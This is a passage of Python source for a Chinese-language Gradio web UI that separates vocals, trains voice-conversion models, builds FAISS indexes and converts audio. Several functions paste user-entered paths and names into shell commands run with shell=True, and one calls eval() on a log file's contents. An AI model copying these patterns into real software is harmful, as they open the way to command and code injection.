uvr(model_name,inp_root,save_root_vocal,paths,save_root_ins):\r\n    infos = []\r\n    try:\r\n        inp_root = inp_root.strip(\" \").strip(\"\\n\")\r\n        save_root_vocal = save_root_vocal.strip(\" \").strip(\"\\n\")\r\n        save_root_ins = save_root_ins.strip(\" \").strip(\"\\n\")\r\n        pre_fun = _audio_pre_(model_path=os.path.join(weight_uvr5_root,model_name+\".pth\"), device=device, is_half=is_half)\r\n        if (inp_root != \"\"):paths = [os.path.join(inp_root, name) for name in os.listdir(inp_root)]\r\n        else:paths = [path.name for path in paths]\r\n        for name in paths:\r\n            inp_path=os.path.join(inp_root,name)\r\n            try:\r\n                pre_fun._path_audio_(inp_path , save_root_ins,save_root_vocal)\r\n                infos.append(\"%s->Success\"%(os.path.basename(inp_path)))\r\n                yield \"\\n\".join(infos)\r\n            except:\r\n                infos.append(\"%s->%s\" % (os.path.basename(inp_path),traceback.format_exc()))\r\n                yield \"\\n\".join(infos)\r\n    except:\r\n        infos.append(traceback.format_exc())\r\n        yield \"\\n\".join(infos)\r\n    finally:\r\n        try:\r\n            del pre_fun.model\r\n            del pre_fun\r\n        except:\r\n            traceback.print_exc()\r\n        print(\"clean_empty_cache\")\r\n        torch.cuda.empty_cache()\r\n    yield \"\\n\".join(infos)\r\n\r\n# Globally, each tab can only have one voice model loaded\r\ndef get_vc(sid):\r\n    global n_spk,tgt_sr,net_g,vc,cpt\r\n    if(sid==\"\"):\r\n        global hubert_model\r\n        print(\"clean_empty_cache\")\r\n        del net_g, n_spk, vc, hubert_model,tgt_sr#,cpt\r\n        hubert_model = net_g=n_spk=vc=hubert_model=tgt_sr=None\r\n        torch.cuda.empty_cache()\r\n        ### the cleanup below does not free everything without this juggling\r\n        if_f0 = cpt.get(\"f0\", 1)\r\n        if (if_f0 == 1):\r\n            net_g = 
SynthesizerTrnMs256NSFsid(*cpt[\"config\"], is_half=is_half)\r\n        else:\r\n            net_g = SynthesizerTrnMs256NSFsid_nono(*cpt[\"config\"])\r\n        del net_g,cpt\r\n        torch.cuda.empty_cache()\r\n        cpt=None\r\n        return {\"visible\": False, \"__type__\": \"update\"}\r\n    person = \"%s/%s\" % (weight_root, sid)\r\n    print(\"loading %s\"%person)\r\n    cpt = torch.load(person, map_location=\"cpu\")\r\n    tgt_sr = cpt[\"config\"][-1]\r\n    cpt[\"config\"][-3]=cpt[\"weight\"][\"emb_g.weight\"].shape[0]#n_spk\r\n    if_f0=cpt.get(\"f0\",1)\r\n    if(if_f0==1):\r\n        net_g = SynthesizerTrnMs256NSFsid(*cpt[\"config\"], is_half=is_half)\r\n    else:\r\n        net_g = SynthesizerTrnMs256NSFsid_nono(*cpt[\"config\"])\r\n    del net_g.enc_q\r\n    print(net_g.load_state_dict(cpt[\"weight\"], strict=False)) # cleanup is incomplete without this line, oddly enough\r\n    net_g.eval().to(device)\r\n    if (is_half):net_g = net_g.half()\r\n    else:net_g = net_g.float()\r\n    vc = VC(tgt_sr, device, is_half)\r\n    n_spk=cpt[\"config\"][-3]\r\n    return {\"visible\": True,\"maximum\": n_spk, \"__type__\": \"update\"}\r\n\r\ndef change_choices():return {\"choices\": sorted(list(os.listdir(weight_root))), \"__type__\": \"update\"}\r\ndef clean():return {\"value\": \"\", \"__type__\": \"update\"}\r\ndef change_f0(if_f0_3,sr2):#np7, f0method8,pretrained_G14,pretrained_D15\r\n    if(if_f0_3==\"是\"):return {\"visible\": True, \"__type__\": \"update\"},{\"visible\": True, \"__type__\": \"update\"},\"pretrained/f0G%s.pth\"%sr2,\"pretrained/f0D%s.pth\"%sr2\r\n    return {\"visible\": False, \"__type__\": \"update\"}, {\"visible\": False, \"__type__\": \"update\"},\"pretrained/G%s.pth\"%sr2,\"pretrained/D%s.pth\"%sr2\r\n\r\nsr_dict={\r\n    \"32k\":32000,\r\n    \"40k\":40000,\r\n    \"48k\":48000,\r\n}\r\n\r\ndef if_done(done,p):\r\n    while 1:\r\n        if(p.poll()==None):sleep(0.5)\r\n        else:break\r\n    done[0]=True\r\n\r\n\r\ndef if_done_multi(done,ps):\r\n    while 1:\r\n        # poll()==None means the process has not finished yet\r\n        # keep waiting as long as any process is still running\r\n        flag=1\r\n        for p in ps:\r\n            if(p.poll()==None):\r\n                flag = 0\r\n                sleep(0.5)\r\n                break\r\n        if(flag==1):break\r\n    done[0]=True\r\n\r\ndef preprocess_dataset(trainset_dir,exp_dir,sr,n_p=ncpu):\r\n    sr=sr_dict[sr]\r\n    os.makedirs(\"%s/logs/%s\"%(now_dir,exp_dir),exist_ok=True)\r\n    f = open(\"%s/logs/%s/preprocess.log\"%(now_dir,exp_dir), \"w\")\r\n    f.close()\r\n    cmd=\"python trainset_preprocess_pipeline_print.py %s %s %s %s/logs/%s\"%(trainset_dir,sr,n_p,now_dir,exp_dir)\r\n    print(cmd)\r\n    p = Popen(cmd, shell=True)#, stdin=PIPE, stdout=PIPE,stderr=PIPE,cwd=now_dir\r\n    ### gradio quirk: popen reads only return everything at once after the process finishes, while plain Python streams line by line; work around it by polling a log file on a timer\r\n    done=[False]\r\n    threading.Thread(target=if_done,args=(done,p,)).start()\r\n    while(1):\r\n        with open(\"%s/logs/%s/preprocess.log\"%(now_dir,exp_dir),\"r\")as f:yield(f.read())\r\n        sleep(1)\r\n        if(done[0]==True):break\r\n    with open(\"%s/logs/%s/preprocess.log\"%(now_dir,exp_dir), \"r\")as f:log = f.read()\r\n    print(log)\r\n    yield log\r\n#but2.click(extract_f0,[gpus6,np7,f0method8,if_f0_3,trainset_dir4],[info2])\r\ndef extract_f0_feature(gpus,n_p,f0method,if_f0,exp_dir):\r\n    gpus=gpus.split(\"-\")\r\n    os.makedirs(\"%s/logs/%s\"%(now_dir,exp_dir),exist_ok=True)\r\n    f = open(\"%s/logs/%s/extract_f0_feature.log\"%(now_dir,exp_dir), \"w\")\r\n    f.close()\r\n    if(if_f0==\"是\"):\r\n        cmd=\"python extract_f0_print.py %s/logs/%s %s %s\"%(now_dir,exp_dir,n_p,f0method)\r\n        print(cmd)\r\n        p = Popen(cmd, shell=True,cwd=now_dir)#, stdin=PIPE, stdout=PIPE,stderr=PIPE\r\n        ### gradio quirk: popen reads only return everything at once after the process finishes; work around it by polling a log file on a timer\r\n        done=[False]\r\n        threading.Thread(target=if_done,args=(done,p,)).start()\r\n        while(1):\r\n            
with open(\"%s/logs/%s/extract_f0_feature.log\"%(now_dir,exp_dir),\"r\")as f:yield(f.read())\r\n sleep(1)\r\n if(done[0]==True):break\r\n with open(\"%s/logs/%s/extract_f0_feature.log\"%(now_dir,exp_dir), \"r\")as f:log = f.read()\r\n print(log)\r\n yield log\r\n ####对不同part分别开多进程\r\n '''\r\n n_part=int(sys.argv[1])\r\n i_part=int(sys.argv[2])\r\n i_gpu=sys.argv[3]\r\n exp_dir=sys.argv[4]\r\n os.environ[\"CUDA_VISIBLE_DEVICES\"]=str(i_gpu)\r\n '''\r\n leng=len(gpus)\r\n ps=[]\r\n for idx,n_g in enumerate(gpus):\r\n cmd=\"python extract_feature_print.py %s %s %s %s/logs/%s\"%(leng,idx,n_g,now_dir,exp_dir)\r\n print(cmd)\r\n p = Popen(cmd, shell=True, cwd=now_dir)#, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, cwd=now_dir\r\n ps.append(p)\r\n ###煞笔gr,popen read都非得全跑完了再一次性读取,不用gr就正常读一句输出一句;只能额外弄出一个文本流定时读\r\n done = [False]\r\n threading.Thread(target=if_done_multi, args=(done, ps,)).start()\r\n while (1):\r\n with open(\"%s/logs/%s/extract_f0_feature.log\"%(now_dir,exp_dir), \"r\")as f:yield (f.read())\r\n sleep(1)\r\n if (done[0] == True): break\r\n with open(\"%s/logs/%s/extract_f0_feature.log\"%(now_dir,exp_dir), \"r\")as f:log = f.read()\r\n print(log)\r\n yield log\r\ndef change_sr2(sr2,if_f0_3):\r\n if(if_f0_3==\"是\"):return \"pretrained/f0G%s.pth\"%sr2,\"pretrained/f0D%s.pth\"%sr2\r\n else:return \"pretrained/G%s.pth\"%sr2,\"pretrained/D%s.pth\"%sr2\r\n#but3.click(click_train,[exp_dir1,sr2,if_f0_3,save_epoch10,total_epoch11,batch_size12,if_save_latest13,pretrained_G14,pretrained_D15,gpus16])\r\ndef click_train(exp_dir1,sr2,if_f0_3,spk_id5,save_epoch10,total_epoch11,batch_size12,if_save_latest13,pretrained_G14,pretrained_D15,gpus16,if_cache_gpu17):\r\n #生成filelist\r\n exp_dir=\"%s/logs/%s\"%(now_dir,exp_dir1)\r\n os.makedirs(exp_dir,exist_ok=True)\r\n gt_wavs_dir=\"%s/0_gt_wavs\"%(exp_dir)\r\n co256_dir=\"%s/3_feature256\"%(exp_dir)\r\n if(if_f0_3==\"是\"):\r\n f0_dir = \"%s/2a_f0\" % (exp_dir)\r\n f0nsf_dir=\"%s/2b-f0nsf\"%(exp_dir)\r\n names=set([name.split(\".\")[0]for name in os.listdir(gt_wavs_dir)])&set([name.split(\".\")[0]for name in os.listdir(co256_dir)])&set([name.split(\".\")[0]for name in os.listdir(f0_dir)])&set([name.split(\".\")[0]for name in os.listdir(f0nsf_dir)])\r\n else:\r\n names=set([name.split(\".\")[0]for name in os.listdir(gt_wavs_dir)])&set([name.split(\".\")[0]for name in os.listdir(co256_dir)])\r\n opt=[]\r\n for name in names:\r\n if (if_f0_3 == \"是\"):\r\n opt.append(\"%s/%s.wav|%s/%s.npy|%s/%s.wav.npy|%s/%s.wav.npy|%s\"%(gt_wavs_dir.replace(\"\\\\\",\"\\\\\\\\\"),name,co256_dir.replace(\"\\\\\",\"\\\\\\\\\"),name,f0_dir.replace(\"\\\\\",\"\\\\\\\\\"),name,f0nsf_dir.replace(\"\\\\\",\"\\\\\\\\\"),name,spk_id5))\r\n else:\r\n opt.append(\"%s/%s.wav|%s/%s.npy|%s\"%(gt_wavs_dir.replace(\"\\\\\",\"\\\\\\\\\"),name,co256_dir.replace(\"\\\\\",\"\\\\\\\\\"),name,spk_id5))\r\n with open(\"%s/filelist.txt\"%exp_dir,\"w\")as f:f.write(\"\\n\".join(opt))\r\n print(\"write filelist done\")\r\n #生成config#无需生成config\r\n # cmd = \"python train_nsf_sim_cache_sid_load_pretrain.py -e mi-test -sr 40k -f0 1 -bs 4 -g 0 -te 10 -se 5 -pg pretrained/f0G40k.pth -pd pretrained/f0D40k.pth -l 1 -c 0\"\r\n cmd = \"python train_nsf_sim_cache_sid_load_pretrain.py -e %s -sr %s -f0 %s -bs %s -g %s -te %s -se %s -pg %s -pd %s -l %s -c %s\" % (exp_dir1,sr2,1 if if_f0_3==\"是\"else 0,batch_size12,gpus16,total_epoch11,save_epoch10,pretrained_G14,pretrained_D15,1 if if_save_latest13==\"是\"else 0,1 if if_cache_gpu17==\"是\"else 0)\r\n print(cmd)\r\n p = Popen(cmd, shell=True, cwd=now_dir)\r\n 
p.wait()\r\n    return \"Training finished. You can check the training log in the console or train.log in the experiment folder\"\r\n# but4.click(train_index, [exp_dir1], info3)\r\ndef train_index(exp_dir1):\r\n    exp_dir=\"%s/logs/%s\"%(now_dir,exp_dir1)\r\n    os.makedirs(exp_dir,exist_ok=True)\r\n    feature_dir=\"%s/3_feature256\"%(exp_dir)\r\n    if(os.path.exists(feature_dir)==False):return \"Please run feature extraction first!\"\r\n    listdir_res=list(os.listdir(feature_dir))\r\n    if(len(listdir_res)==0):return \"Please run feature extraction first!\"\r\n    npys = []\r\n    for name in sorted(listdir_res):\r\n        phone = np.load(\"%s/%s\" % (feature_dir, name))\r\n        npys.append(phone)\r\n    big_npy = np.concatenate(npys, 0)\r\n    np.save(\"%s/total_fea.npy\"%exp_dir, big_npy)\r\n    n_ivf = big_npy.shape[0] // 39\r\n    infos=[]\r\n    infos.append(\"%s,%s\"%(big_npy.shape,n_ivf))\r\n    yield \"\\n\".join(infos)\r\n    index = faiss.index_factory(256, \"IVF%s,Flat\"%n_ivf)\r\n    infos.append(\"training\")\r\n    yield \"\\n\".join(infos)\r\n    index_ivf = faiss.extract_index_ivf(index) #\r\n    index_ivf.nprobe = int(np.power(n_ivf,0.3))\r\n    index.train(big_npy)\r\n    faiss.write_index(index, '%s/trained_IVF%s_Flat_nprobe_%s.index'%(exp_dir,n_ivf,index_ivf.nprobe))\r\n    infos.append(\"adding\")\r\n    yield \"\\n\".join(infos)\r\n    index.add(big_npy)\r\n    faiss.write_index(index, '%s/added_IVF%s_Flat_nprobe_%s.index'%(exp_dir,n_ivf,index_ivf.nprobe))\r\n    infos.append(\"Index built successfully: added_IVF%s_Flat_nprobe_%s.index\"%(n_ivf,index_ivf.nprobe))\r\n    yield \"\\n\".join(infos)\r\n#but5.click(train1key, [exp_dir1, sr2, if_f0_3, trainset_dir4, spk_id5, gpus6, np7, f0method8, save_epoch10, total_epoch11, batch_size12, if_save_latest13, pretrained_G14, pretrained_D15, gpus16, if_cache_gpu17], info3)\r\ndef train1key(exp_dir1, sr2, if_f0_3, trainset_dir4, spk_id5, gpus6, np7, f0method8, save_epoch10, total_epoch11, batch_size12, if_save_latest13, pretrained_G14, pretrained_D15, gpus16, if_cache_gpu17):\r\n    infos=[]\r\n    def get_info_str(strr):\r\n        infos.append(strr)\r\n        return \"\\n\".join(infos)\r\n    os.makedirs(\"%s/logs/%s\"%(now_dir,exp_dir1),exist_ok=True)\r\n    ######### step1: process the data\r\n    open(\"%s/logs/%s/preprocess.log\"%(now_dir,exp_dir1), \"w\").close()\r\n    cmd=\"python trainset_preprocess_pipeline_print.py %s %s %s %s/logs/%s\"%(trainset_dir4,sr_dict[sr2],ncpu,now_dir,exp_dir1)\r\n    yield get_info_str(\"step1: processing the data\")\r\n    yield get_info_str(cmd)\r\n    p = Popen(cmd, shell=True)\r\n    p.wait()\r\n    with open(\"%s/logs/%s/preprocess.log\" % (now_dir, exp_dir1), \"r\")as f: print(f.read())\r\n    ######### step2a: extract pitch\r\n    open(\"%s/logs/%s/extract_f0_feature.log\" % (now_dir, exp_dir1), \"w\")\r\n    if(if_f0_3==\"是\"):\r\n        yield get_info_str(\"step2a: extracting pitch\")\r\n        cmd=\"python extract_f0_print.py %s/logs/%s %s %s\"%(now_dir,exp_dir1,np7,f0method8)\r\n        yield get_info_str(cmd)\r\n        p = Popen(cmd, shell=True,cwd=now_dir)\r\n        p.wait()\r\n        with open(\"%s/logs/%s/extract_f0_feature.log\"%(now_dir,exp_dir1), \"r\")as f:print(f.read())\r\n    else:yield get_info_str(\"step2a: no pitch extraction needed\")\r\n    ####### step2b: extract features\r\n    yield get_info_str(\"step2b: extracting features\")\r\n    gpus=gpus16.split(\"-\")\r\n    leng=len(gpus)\r\n    ps=[]\r\n    for idx,n_g in enumerate(gpus):\r\n        cmd=\"python extract_feature_print.py %s %s %s %s/logs/%s\"%(leng,idx,n_g,now_dir,exp_dir1)\r\n        yield get_info_str(cmd)\r\n        p = Popen(cmd, shell=True, cwd=now_dir)#, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, cwd=now_dir\r\n        ps.append(p)\r\n    for p in ps:p.wait()\r\n    with open(\"%s/logs/%s/extract_f0_feature.log\"%(now_dir,exp_dir1), \"r\")as f:print(f.read())\r\n    ####### step3a: train the model\r\n    yield get_info_str(\"step3a: training the model\")\r\n    # generate the filelist\r\n    
exp_dir=\"%s/logs/%s\"%(now_dir,exp_dir1)\r\n gt_wavs_dir=\"%s/0_gt_wavs\"%(exp_dir)\r\n co256_dir=\"%s/3_feature256\"%(exp_dir)\r\n if(if_f0_3==\"是\"):\r\n f0_dir = \"%s/2a_f0\" % (exp_dir)\r\n f0nsf_dir=\"%s/2b-f0nsf\"%(exp_dir)\r\n names=set([name.split(\".\")[0]for name in os.listdir(gt_wavs_dir)])&set([name.split(\".\")[0]for name in os.listdir(co256_dir)])&set([name.split(\".\")[0]for name in os.listdir(f0_dir)])&set([name.split(\".\")[0]for name in os.listdir(f0nsf_dir)])\r\n else:\r\n names=set([name.split(\".\")[0]for name in os.listdir(gt_wavs_dir)])&set([name.split(\".\")[0]for name in os.listdir(co256_dir)])\r\n opt=[]\r\n for name in names:\r\n if (if_f0_3 == \"是\"):\r\n opt.append(\"%s/%s.wav|%s/%s.npy|%s/%s.wav.npy|%s/%s.wav.npy|%s\"%(gt_wavs_dir.replace(\"\\\\\",\"\\\\\\\\\"),name,co256_dir.replace(\"\\\\\",\"\\\\\\\\\"),name,f0_dir.replace(\"\\\\\",\"\\\\\\\\\"),name,f0nsf_dir.replace(\"\\\\\",\"\\\\\\\\\"),name,spk_id5))\r\n else:\r\n opt.append(\"%s/%s.wav|%s/%s.npy|%s\"%(gt_wavs_dir.replace(\"\\\\\",\"\\\\\\\\\"),name,co256_dir.replace(\"\\\\\",\"\\\\\\\\\"),name,spk_id5))\r\n with open(\"%s/filelist.txt\"%exp_dir,\"w\")as f:f.write(\"\\n\".join(opt))\r\n yield get_info_str(\"write filelist done\")\r\n cmd = \"python train_nsf_sim_cache_sid_load_pretrain.py -e %s -sr %s -f0 %s -bs %s -g %s -te %s -se %s -pg %s -pd %s -l %s -c %s\" % (exp_dir1,sr2,1 if if_f0_3==\"是\"else 0,batch_size12,gpus16,total_epoch11,save_epoch10,pretrained_G14,pretrained_D15,1 if if_save_latest13==\"是\"else 0,1 if if_cache_gpu17==\"是\"else 0)\r\n yield get_info_str(cmd)\r\n p = Popen(cmd, shell=True, cwd=now_dir)\r\n p.wait()\r\n yield get_info_str(\"训练结束,您可查看控制台训练日志或实验文件夹下的train.log\")\r\n #######step3b:训练索引\r\n feature_dir=\"%s/3_feature256\"%(exp_dir)\r\n npys = []\r\n listdir_res=list(os.listdir(feature_dir))\r\n for name in sorted(listdir_res):\r\n phone = np.load(\"%s/%s\" % (feature_dir, name))\r\n npys.append(phone)\r\n big_npy = np.concatenate(npys, 0)\r\n np.save(\"%s/total_fea.npy\"%exp_dir, big_npy)\r\n n_ivf = big_npy.shape[0] // 39\r\n yield get_info_str(\"%s,%s\"%(big_npy.shape,n_ivf))\r\n index = faiss.index_factory(256, \"IVF%s,Flat\"%n_ivf)\r\n yield get_info_str(\"training index\")\r\n index_ivf = faiss.extract_index_ivf(index) #\r\n index_ivf.nprobe = int(np.power(n_ivf,0.3))\r\n index.train(big_npy)\r\n faiss.write_index(index, '%s/trained_IVF%s_Flat_nprobe_%s.index'%(exp_dir,n_ivf,index_ivf.nprobe))\r\n yield get_info_str(\"adding index\")\r\n index.add(big_npy)\r\n faiss.write_index(index, '%s/added_IVF%s_Flat_nprobe_%s.index'%(exp_dir,n_ivf,index_ivf.nprobe))\r\n yield get_info_str(\"成功构建索引,added_IVF%s_Flat_nprobe_%s.index\"%(n_ivf,index_ivf.nprobe))\r\n yield get_info_str(\"全流程结束!\")\r\n\r\n# ckpt_path2.change(change_info_,[ckpt_path2],[sr__,if_f0__])\r\ndef change_info_(ckpt_path):\r\n if(os.path.exists(ckpt_path.replace(os.path.basename(ckpt_path),\"train.log\"))==False):return {\"__type__\": \"update\"},{\"__type__\": \"update\"}\r\n try:\r\n with open(ckpt_path.replace(os.path.basename(ckpt_path),\"train.log\"),\"r\")as f:\r\n info=eval(f.read().strip(\"\\n\").split(\"\\n\")[0].split(\"\\t\")[-1])\r\n sr,f0=info[\"sample_rate\"],info[\"if_f0\"]\r\n return sr,str(f0)\r\n except:\r\n traceback.print_exc()\r\n return {\"__type__\": \"update\"}, {\"__type__\": \"update\"}\r\n\r\n\r\nwith gr.Blocks() as app:\r\n gr.Markdown(value=\"\"\"\r\n 本软件以MIT协议开源,作者不对软件具备任何控制力,使用软件者、传播软件导出的声音者自负全责。
        \r\n   如不认可该条款,则不能使用或引用软件包内任何代码和文件。详见根目录\"使用需遵守的协议-LICENSE.txt\"。\r\n    \"\"\")\r\n    with gr.Tabs():\r\n        with gr.TabItem(\"模型推理\"):\r\n            with gr.Row():\r\n                sid0 = gr.Dropdown(label=\"推理音色\", choices=names)\r\n                refresh_button = gr.Button(\"刷新音色列表\", variant=\"primary\")\r\n                refresh_button.click(\r\n                    fn=change_choices,\r\n                    inputs=[],\r\n                    outputs=[sid0]\r\n                )\r\n                clean_button = gr.Button(\"卸载音色省显存\", variant=\"primary\")\r\n                spk_item = gr.Slider(minimum=0, maximum=2333, step=1, label='请选择说话人id', value=0, visible=False, interactive=True)\r\n                clean_button.click(\r\n                    fn=clean,\r\n                    inputs=[],\r\n                    outputs=[sid0]\r\n                )\r\n                sid0.change(\r\n                    fn=get_vc,\r\n                    inputs=[sid0],\r\n                    outputs=[spk_item],\r\n                )\r\n            with gr.Group():\r\n                gr.Markdown(value=\"\"\"\r\n    男转女推荐+12key,女转男推荐-12key,如果音域爆炸导致音色失真也可以自己调整到合适音域。\r\n    \"\"\")\r\n                with gr.Row():\r\n                    with gr.Column():\r\n                        vc_transform0 = gr.Number(label=\"变调(整数,半音数量,升八度12降八度-12)\", value=0)\r\n                        input_audio0 = gr.Textbox(label=\"输入待处理音频文件路径(默认是正确格式示例)\",value=\"E:\\codes\\py39\\\\vits_vc_gpu_train\\\\todo-songs\\冬之花clip1.wav\")\r\n                        f0method0=gr.Radio(label=\"选择音高提取算法,输入歌声可用pm提速,harvest低音好但巨慢无比\", choices=[\"pm\",\"harvest\"],value=\"pm\", interactive=True)\r\n                    with gr.Column():\r\n                        file_index1 = gr.Textbox(label=\"特征检索库文件路径\",value=\"E:\\codes\\py39\\\\vits_vc_gpu_train\\logs\\mi-test-1key\\\\added_IVF677_Flat_nprobe_7.index\", interactive=True)\r\n                        file_big_npy1 = gr.Textbox(label=\"特征文件路径\",value=\"E:\\codes\\py39\\\\vits_vc_gpu_train\\logs\\mi-test-1key\\\\total_fea.npy\", interactive=True)\r\n                        index_rate1 = gr.Slider(minimum=0, maximum=1,label='检索特征占比', value=1,interactive=True)\r\n                    f0_file = gr.File(label=\"F0曲线文件,可选,一行一个音高,代替默认F0及升降调\")\r\n                    but0=gr.Button(\"转换\", variant=\"primary\")\r\n                    with gr.Column():\r\n                        vc_output1 = gr.Textbox(label=\"输出信息\")\r\n                        vc_output2 = gr.Audio(label=\"输出音频(右下角三个点,点了可以下载)\")\r\n                    but0.click(vc_single, [spk_item, input_audio0, vc_transform0,f0_file,f0method0,file_index1,file_big_npy1,index_rate1], [vc_output1, vc_output2])\r\n            with gr.Group():\r\n                gr.Markdown(value=\"\"\"\r\n    批量转换,输入待转换音频文件夹,或上传多个音频文件,在指定文件夹(默认opt)下输出转换的音频。\r\n    \"\"\")\r\n                with gr.Row():\r\n                    with gr.Column():\r\n                        vc_transform1 = gr.Number(label=\"变调(整数,半音数量,升八度12降八度-12)\", value=0)\r\n                        opt_input = gr.Textbox(label=\"指定输出文件夹\",value=\"opt\")\r\n                        f0method1=gr.Radio(label=\"选择音高提取算法,输入歌声可用pm提速,harvest低音好但巨慢无比\", choices=[\"pm\",\"harvest\"],value=\"pm\", interactive=True)\r\n                    with gr.Column():\r\n                        file_index2 = gr.Textbox(label=\"特征检索库文件路径\",value=\"E:\\codes\\py39\\\\vits_vc_gpu_train\\logs\\mi-test-1key\\\\added_IVF677_Flat_nprobe_7.index\", interactive=True)\r\n                        file_big_npy2 = gr.Textbox(label=\"特征文件路径\",value=\"E:\\codes\\py39\\\\vits_vc_gpu_train\\logs\\mi-test-1key\\\\total_fea.npy\", interactive=True)\r\n                        index_rate2 = gr.Slider(minimum=0, maximum=1,label='检索特征占比', value=1,interactive=True)\r\n                    with gr.Column():\r\n                        dir_input = gr.Textbox(label=\"输入待处理音频文件夹路径(去文件管理器地址栏拷就行了)\",value=\"E:\\codes\\py39\\\\vits_vc_gpu_train\\\\todo-songs\")\r\n                        inputs = gr.File(file_count=\"multiple\", label=\"也可批量输入音频文件,二选一,优先读文件夹\")\r\n                    but1=gr.Button(\"转换\", variant=\"primary\")\r\n                    vc_output3 = gr.Textbox(label=\"输出信息\")\r\n                    but1.click(vc_multi, [spk_item, dir_input,opt_input,inputs, vc_transform1,f0method1,file_index2,file_big_npy2,index_rate2], [vc_output3])\r\n        with gr.TabItem(\"伴奏人声分离\"):\r\n            with gr.Group():\r\n                gr.Markdown(value=\"\"\"\r\n    人声伴奏分离批量处理,使用UVR5模型。
        \r\n 不带和声用HP2,带和声且提取的人声不需要和声用HP5
        \r\n 合格的文件夹路径格式举例:E:\\codes\\py39\\\\vits_vc_gpu\\白鹭霜华测试样例(去文件管理器地址栏拷就行了)\r\n \"\"\")\r\n with gr.Row():\r\n with gr.Column():\r\n dir_wav_input = gr.Textbox(label=\"输入待处理音频文件夹路径\",value=\"E:\\codes\\py39\\\\vits_vc_gpu_train\\\\todo-songs\")\r\n wav_inputs = gr.File(file_count=\"multiple\", label=\"也可批量输入音频文件,二选一,优先读文件夹\")\r\n with gr.Column():\r\n model_choose = gr.Dropdown(label=\"模型\", choices=uvr5_names)\r\n opt_vocal_root = gr.Textbox(label=\"指定输出人声文件夹\",value=\"opt\")\r\n opt_ins_root = gr.Textbox(label=\"指定输出乐器文件夹\",value=\"opt\")\r\n but2=gr.Button(\"转换\", variant=\"primary\")\r\n vc_output4 = gr.Textbox(label=\"输出信息\")\r\n but2.click(uvr, [model_choose, dir_wav_input,opt_vocal_root,wav_inputs,opt_ins_root], [vc_output4])\r\n with gr.TabItem(\"训练\"):\r\n gr.Markdown(value=\"\"\"\r\n step1:填写实验配置。实验数据放在logs下,每个实验一个文件夹,需手工输入实验名路径,内含实验配置,日志,训练得到的模型文件。\r\n \"\"\")\r\n with gr.Row():\r\n exp_dir1 = gr.Textbox(label=\"输入实验名\",value=\"mi-test\")\r\n sr2 = gr.Radio(label=\"目标采样率\", choices=[\"32k\",\"40k\",\"48k\"],value=\"40k\", interactive=True)\r\n if_f0_3 = gr.Radio(label=\"模型是否带音高指导(唱歌一定要,语音可以不要)\", choices=[\"是\",\"否\"],value=\"是\", interactive=True)\r\n with gr.Group():#暂时单人的,后面支持最多4人的#数据处理\r\n gr.Markdown(value=\"\"\"\r\n step2a:自动遍历训练文件夹下所有可解码成音频的文件并进行切片归一化,在实验目录下生成2个wav文件夹;暂时只支持单人训练。\r\n \"\"\")\r\n with gr.Row():\r\n trainset_dir4 = gr.Textbox(label=\"输入训练文件夹路径\",value=\"E:\\语音音频+标注\\米津玄师\\src\")\r\n spk_id5 = gr.Slider(minimum=0, maximum=4, step=1, label='请指定说话人id', value=0,interactive=True)\r\n but1=gr.Button(\"处理数据\", variant=\"primary\")\r\n info1=gr.Textbox(label=\"输出信息\",value=\"\")\r\n but1.click(preprocess_dataset,[trainset_dir4,exp_dir1,sr2],[info1])\r\n with gr.Group():\r\n gr.Markdown(value=\"\"\"\r\n step2b:使用CPU提取音高(如果模型带音高),使用GPU提取特征(选择卡号)\r\n \"\"\")\r\n with gr.Row():\r\n with gr.Column():\r\n gpus6 = gr.Textbox(label=\"以-分隔输入使用的卡号,例如 0-1-2 使用卡0和卡1和卡2\",value=gpus,interactive=True)\r\n gpu_info9 = gr.Textbox(label=\"显卡信息\",value=gpu_info)\r\n with gr.Column():\r\n np7 = gr.Slider(minimum=0, maximum=ncpu, step=1, label='提取音高使用的CPU进程数', value=ncpu,interactive=True)\r\n f0method8 = gr.Radio(label=\"选择音高提取算法:输入歌声可用pm提速,高质量语音但CPU差可用dio提速,harvest质量更好但慢\", choices=[\"pm\", \"harvest\",\"dio\"], value=\"harvest\", interactive=True)\r\n but2=gr.Button(\"特征提取\", variant=\"primary\")\r\n info2=gr.Textbox(label=\"输出信息\",value=\"\",max_lines=8)\r\n but2.click(extract_f0_feature,[gpus6,np7,f0method8,if_f0_3,exp_dir1],[info2])\r\n with gr.Group():\r\n gr.Markdown(value=\"\"\"\r\n step3:填写训练设置,开始训练模型和索引\r\n \"\"\")\r\n with gr.Row():\r\n save_epoch10 = gr.Slider(minimum=0, maximum=50, step=1, label='保存频率save_every_epoch', value=5,interactive=True)\r\n total_epoch11 = gr.Slider(minimum=0, maximum=100, step=1, label='总训练轮数total_epoch', value=10,interactive=True)\r\n batch_size12 = gr.Slider(minimum=0, maximum=32, step=1, label='batch_size', value=4,interactive=True)\r\n if_save_latest13 = gr.Radio(label=\"是否仅保存最新的ckpt文件以节省硬盘空间\", choices=[\"是\", \"否\"], value=\"否\", interactive=True)\r\n if_cache_gpu17 = gr.Radio(label=\"是否缓存所有训练集至显存。10min以下小数据可缓存以加速训练,大数据缓存会炸显存也加不了多少速\", choices=[\"是\", \"否\"], value=\"否\", interactive=True)\r\n with gr.Row():\r\n pretrained_G14 = gr.Textbox(label=\"加载预训练底模G路径\", value=\"pretrained/f0G40k.pth\",interactive=True)\r\n pretrained_D15 = gr.Textbox(label=\"加载预训练底模D路径\", value=\"pretrained/f0D40k.pth\",interactive=True)\r\n sr2.change(change_sr2, [sr2,if_f0_3], [pretrained_G14,pretrained_D15])\r\n if_f0_3.change(change_f0, [if_f0_3, sr2], 
